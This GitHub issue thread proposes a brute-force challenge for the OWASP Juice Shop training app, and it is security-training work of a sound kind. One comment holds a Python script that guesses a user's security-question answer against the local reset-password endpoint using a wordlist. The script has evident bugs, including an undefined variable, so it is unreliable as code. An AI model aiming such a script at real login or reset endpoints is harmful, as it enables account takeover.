### ISSUE TITLE
Brute force a REST API

### ISSUE THREAD

**Issue by agrawalarpit14** [juice-shop/juice-shop#824]
A challenge which makes a user write a small script to brute force, to gain unauthorised access.

**Comment by bkimminich** [comment]
We have some BF challenges already - what do you have in mind exactly?

**Comment by agrawalarpit14** [comment]
How about a challenge built along these lines?
A challenge built around gaining access to a user's account who has a weak security question(such that the answer belongs to possibly a small set, 50-60 values). Which could be solved by writing a small script such as:
```
import requests
import json

ansList = []
ansL = []
ansdict = input("Enter path to dictionary file: ")
url = "http://localhost:3000/rest/user/reset-password"


def createPassList(dict_file):
    d = open(dict_file)
    for line in d.readlines():
        ansL = line.split(' ')
        ans = ans.rstrip('\n')
        line = line.strip('\n')
        ansL.append(ans)
    return ansL


def tryBrute():
    for ans in ansL:
        payload={
            "answer": ans,
            "email": "bjoern@juice-sh.op",
            "new": "----------",
            "repeat": "----------"
        }
        response = requests.post(url, data=json.dumps(payload), headers=header)
        print(ans, response.content)


header = {
           'Content-Type': "application/json",
           'Authorization': "Bearer ...."       
}

ansList = createPassList(ansdict)
tryBrute()

```
where the possible answers are stored in a file for which path is taken as input in above script? The security question can be something like `What is the brand of your cell phone?`

**Comment by agrawalarpit14** [comment]
Hi @bkimminich I thought of such an attack when I wanted to brute force, but was unable to find any tool that let me change particular value of a payload field for an API. This kind of attack is possible because the API doesn't block continuous requests(if not too many). Actually, the whole point of the challenge is to learn how to change just a field keeping everything else same and automating the task. Please let me know your views on this. Thank You✌🏻

**Comment by bkimminich** [comment]
The _Reset Morty's Password_ challenge is about brute forcing with a reduced word list already, as is one of the _Reset Bjoern's Password_ tiers which can be BF'ed or inferred from Internet research. There's even a published sophisticated Python script for that which I link to from the eBook solution: https://gist.github.com/philly-vanilly/70cd34a7686e4bb75b08d3caa1f6a820

**Comment by agrawalarpit14** [comment]
In that case I also think it won't make sense to make a similar challenge.
